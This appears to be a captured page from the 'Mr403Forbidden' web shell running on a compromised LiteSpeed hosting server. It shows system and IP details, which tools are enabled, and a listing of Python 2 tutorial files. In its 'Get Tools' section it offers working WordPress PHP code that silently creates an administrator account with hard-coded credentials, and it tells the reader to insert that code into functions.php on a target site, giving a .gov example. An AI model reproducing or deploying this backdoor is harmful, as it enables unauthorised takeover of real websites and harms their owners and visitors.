./Mr403Forbidden

:/usr/share/doc/python2-docs/html/tutorial/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
appendix.html file 2019-03-27 12:19 16.59 KB root/root s---------
appetite.html file 2019-03-27 12:19 10.42 KB root/root s---------
classes.html file 2019-03-27 12:19 89.91 KB root/root s---------
controlflow.html file 2019-03-27 12:19 73.24 KB root/root s---------
datastructures.html file 2019-03-27 12:19 87.16 KB root/root s---------
errors.html file 2019-03-27 12:19 47.43 KB root/root s---------
floatingpoint.html file 2019-03-27 12:19 21.86 KB root/root s---------
index.html file 2019-03-27 12:19 25.17 KB root/root s---------
inputoutput.html file 2019-03-27 12:19 52.71 KB root/root s---------
interactive.html file 2019-03-27 12:19 19.78 KB root/root s---------
interpreter.html file 2019-03-27 12:19 18.21 KB root/root s---------
introduction.html file 2019-03-27 12:19 65.34 KB root/root s---------
modules.html file 2019-03-27 12:19 60.94 KB root/root s---------
stdlib.html file 2019-03-27 12:19 41.93 KB root/root s---------
stdlib2.html file 2019-03-27 12:19 55.5 KB root/root s---------
whatnow.html file 2019-03-27 12:19 9.95 KB root/root s---------

© ./Mr403Forbidden